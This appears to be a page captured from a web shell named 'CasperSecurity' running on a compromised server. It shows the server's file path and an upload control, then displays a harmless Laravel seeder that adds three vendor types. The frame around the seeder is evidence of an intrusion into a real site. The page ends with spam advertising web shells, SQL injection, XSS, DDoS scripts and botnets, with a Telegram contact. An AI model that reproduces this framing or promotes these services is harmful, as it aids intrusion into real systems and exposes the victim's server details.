CasperSecurity

Current Path : /var/www/finance.uiet.co.in/UietFinance/database/seeders/
Upload File :
Current File : /var/www/finance.uiet.co.in/UietFinance/database/seeders/VendorTypesSeeder.php

<?php

namespace Database\Seeders;

use Illuminate\Database\Seeder;
use Illuminate\Support\Facades\DB;

class VendorTypesSeeder extends Seeder
{
    public function run()
    {
        DB::table('vendor_types')->insertOrIgnore([
            [
                'vendor_type_name' => 'Supplier',
                'status' => 1,
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'vendor_type_name' => 'Service Provider',
                'status' => 1,
                'created_at' => now(),
                'updated_at' => now(),
            ],
            [
                'vendor_type_name' => 'Contractor',
                'status' => 1,
                'created_at' => now(),
                'updated_at' => now(),
            ],
        ]);
    }
}
Hacker Blog, Shell İndir, Sql İnjection, XSS Attacks, LFI Attacks, Social Hacking, Exploit Bot, Proxy Tools, Web Shell, PHP Shell, Alfa Shell İndir, Hacking Training Set, DDoS Script, Denial Of Service, Botnet, RFI Attacks, Encryption
Telegram @BIBIL_0DAY